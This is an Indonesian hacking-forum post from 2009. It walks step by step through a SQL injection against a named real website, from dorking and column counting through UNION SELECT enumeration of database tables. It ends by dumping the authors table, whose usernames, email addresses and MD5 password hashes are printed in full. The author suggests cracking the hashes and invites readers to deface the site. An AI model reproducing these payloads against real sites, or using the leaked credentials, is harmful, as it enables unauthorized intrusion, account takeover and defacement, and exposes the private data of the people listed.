| | [again] nginjek pke sql | |
| | Author | Message |
---|
jzt.nwbie Administrator
Number of posts : 529 Location : /home/jzt.nwbie Points : 109 Registration date : 2008-09-16
| Subject: [again] nginjek pke sql Tue Apr 07, 2009 1:36 am | |
| ================================================= dork : inurl:"mod.php?mod=publisher place : myR00M location : A****A time : 00:35 wib ================================================= /* ACTION START */ step by step 1. cari target: http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=462. cek bug: code : ' or - http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46' klo ada error (warning) like this: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in home/flora/public_html/mod/publisher/publisher.php on line 309 berarti bse di inject, klo g ada warning... cari target lain... msti sbar... NEXT ( --> PAS UDAH DAPAT TARGENYA ) 3. ngitung jumlah tabel: http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+1 http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+2 http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+3 -->etc http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+11 -->end akhirnya, brenti di angka 11... artinya ada 10 kolom 4. cari no togel: http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,3,4,5,6,7,8,9,10-- hasil: dapatnya angka 3 5. cari tau versi: code = @@version or version() http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,@@version,4,5,6,7,8,9,10--6. cari nama table: code = group_concat(table_name) +from+information_schema.tables+where+table_schema=database()-- http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()-- kluar deh tabel2-na... authors,banner,bannerclient,counter,exchange_links,jos_adsmanager_ads,jos_adsmanager_categories,jos_adsmanager_columns,jos_adsmanager_config,jos_adsmanager_field_values,jos_adsmanager_fields,jos_adsmanager_positions,jos_adsmanager_profile,jos_components,jos_core_acl_aro,jos_core_acl_aro_groups,jos_core_acl_aro_sections,jos_core_acl_groups_ 7. cari nama kolom dalam tabel pilihan (pilihan = authors) : code = group_concat(column_name) +from+information_schema.columns+where+table_name=0x[konversi nama kolom ascii ke hex]-- sebelumnya, convert code ascii dari tabel yg akan dilihat kolomnya. http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(column_name),4,5,6,7,8,9,10%20from%20information_schema.columns+where+table_name=0x617574686f7273--8. ngliat isi table http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(aid,0x3a,name,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),4,5,6,7,8,9,10%20from%20authors hasilnya: florakita:florakita::anantakarna@yahoo.com:979c8e8f8271e3431249f935cd7d3f4c:7,admin:admin::admin@admin.com:e6db7f33faf25a5dee7492f20b50b48d:13,duniaflora:editor::info@duniaflora.com:979c8e8f8271e3431249f935cd7d3f4c:27 tgal decrypt pwd md5-na... =============================================================================================================================================== /* END OF ACTION */ ampe ini aja yah... g mles nge deface nih, d ngantuk... klo m dilanjutin deface, wong silahkan temen2... monggo... now, it's time for me to sleep GUYZ... have a nice dream... see a, tumorow =============================================================================== -=THANKS=- - JC, FOR HIS BLESSING TO ME - MY_B3L0V3D_M0M... LUV U - MY_F4M1LY_BR0TH3R5_n_515T3R5... - MY_GIRL_b094 -=GREETZ=- * All UnKlab Forum Members * All Hackers-Center Members %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% N.B: - Ascii to Hexa Converter http://www.dolcevie.com/js/converter.html- md5 crack http://thesoftwareengineer.org/services/md5.php%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% | |
| | | ZaNo Whiz
Number of posts : 245 Location : trace me if u can.. Points : 222 Registration date : 2009-02-02
| Subject: Re: [again] nginjek pke sql Sun Apr 19, 2009 11:19 am | |
| | |
| | | | [again] nginjek pke sql | |
|
| Permissions in this forum: | You cannot reply to topics in this forum
| |
| |
| March 2024 | Mon | Tue | Wed | Thu | Fri | Sat | Sun |
---|
| | | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | Calendar |
|
Social bookmarking |
Bookmark and share the address of UNKLAB FORUM on your social bookmarking website |
|
Visitors | |
|